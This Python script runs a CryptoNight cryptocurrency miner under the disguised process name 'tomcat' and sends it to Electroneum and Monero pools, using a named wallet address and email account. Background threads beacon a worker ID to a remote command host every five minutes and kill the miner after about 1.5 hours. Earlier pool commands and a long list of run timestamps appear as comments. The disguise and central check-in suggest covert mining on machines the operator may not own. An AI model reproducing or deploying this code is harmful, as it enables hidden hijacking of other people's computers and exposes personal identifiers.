import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:01.855628
#2018-02-17 17:36:06.958078
#2018-02-17 19:24:07.541143
#2018-02-17 21:13:06.233385
#2018-02-17 22:57:04.490908
#2018-02-18 00:42:01.878590
#2018-02-18 02:31:06.537796
#2018-02-18 04:18:07.367893
#2018-02-18 06:09:07.523576
#2018-02-18 07:58:06.494602
#2018-02-18 09:46:04.959033
#2018-02-18 11:32:04.688175
#2018-02-18 13:18:05.600549
#2018-02-18 15:08:06.951578
#2018-02-18 16:56:07.335293
#2018-02-18 18:45:06.339836
#2018-02-18 20:31:06.552023
#2018-02-18 22:17:05.395312
#2018-02-19 00:06:07.503780
#2018-02-19 01:53:04.312009
#2018-02-19 03:40:01.758719
#2018-02-19 05:25:04.414837
#2018-02-19 07:12:04.052013
#2018-02-19 09:01:01.545083
#2018-02-19 10:49:07.711600
#2018-02-19 12:37:06.361986
#2018-02-19 14:25:07.737836
#2018-02-19 16:15:05.761016
#2018-02-19 18:01:09.846243
#2018-02-19 19:49:04.973333
#2018-02-19 21:38:05.414955
#2018-02-19 23:23:07.630692
#2018-02-20 01:09:05.606936
#2018-02-20 02:58:03.560409
#2018-02-20 04:45:01.581105
#2018-02-20 06:29:03.958953
#2018-02-20 08:14:01.700711
#2018-02-20 10:00:01.520512
#2018-02-20 11:44:04.017146
#2018-02-20 13:32:07.391344
#2018-02-20 15:16:04.409635
#2018-02-20 17:03:07.056546
#2018-02-20 18:52:04.766506
#2018-02-20 20:43:08.353679
#2018-02-20 22:28:08.015739
#2018-02-21 00:10:08.631122
#2018-02-21 01:55:08.225516
#2018-02-21 03:43:02.052393
#2018-02-21 05:30:08.744429
#2018-02-21 07:18:07.423073
#2018-02-21 09:02:07.647019
#2018-02-21 10:50:06.975356
#2018-02-21 12:36:03.919107
#2018-02-21 14:22:06.716541
#2018-02-21 16:08:09.015175
#2018-02-21 17:59:07.708413
#2018-02-21 19:44:05.845056
#2018-02-21 21:34:07.336880
#2018-02-21 23:21:07.186264
#2018-02-22 01:09:07.598676
#2018-02-22 02:57:06.135638
#2018-02-22 04:44:05.842565
#2018-02-22 06:29:02.086366
#2018-02-22 08:16:06.724022
#2018-02-22 10:05:08.275849
#2018-02-22 11:49:11.371652
#2018-02-22 13:35:08.933734
#2018-02-22 15:23:10.749369
#2018-02-22 17:08:05.700211
#2018-02-22 18:54:05.120625
#2018-02-22 20:47:04.388131
#2018-02-22 22:33:07.185998
#2018-02-23 00:21:06.017951
#2018-02-23 02:10:10.191061
#2018-02-23 03:58:05.069760
#2018-02-23 05:44:09.319465
#2018-02-23 07:35:08.390556
#2018-02-23 09:38:04.241017
#2018-02-23 11:42:06.841488
#2018-02-23 13:33:09.222285
#2018-02-23 15:18:06.682571
#2018-02-23 17:05:09.301940
#2018-02-23 18:53:04.501839
#2018-02-23 20:40:04.469436
#2018-02-23 22:27:07.889887
#2018-02-24 00:12:08.644364
#2018-02-24 02:05:01.991113
#2018-02-24 03:55:07.315262
#2018-02-24 05:41:03.345208
#2018-02-24 07:31:07.703127
#2018-02-24 09:18:04.818302
#2018-02-24 11:14:04.521302
#2018-02-24 13:03:04.140476
#2018-02-24 14:50:07.418850
#2018-02-24 16:42:07.068655
#2018-02-24 18:31:01.664470
#2018-02-24 20:18:07.238447
#2018-02-24 22:12:01.454915
#2018-02-25 02:27:06.949087
#2018-02-25 06:06:07.321608
#2018-02-25 11:38:05.649756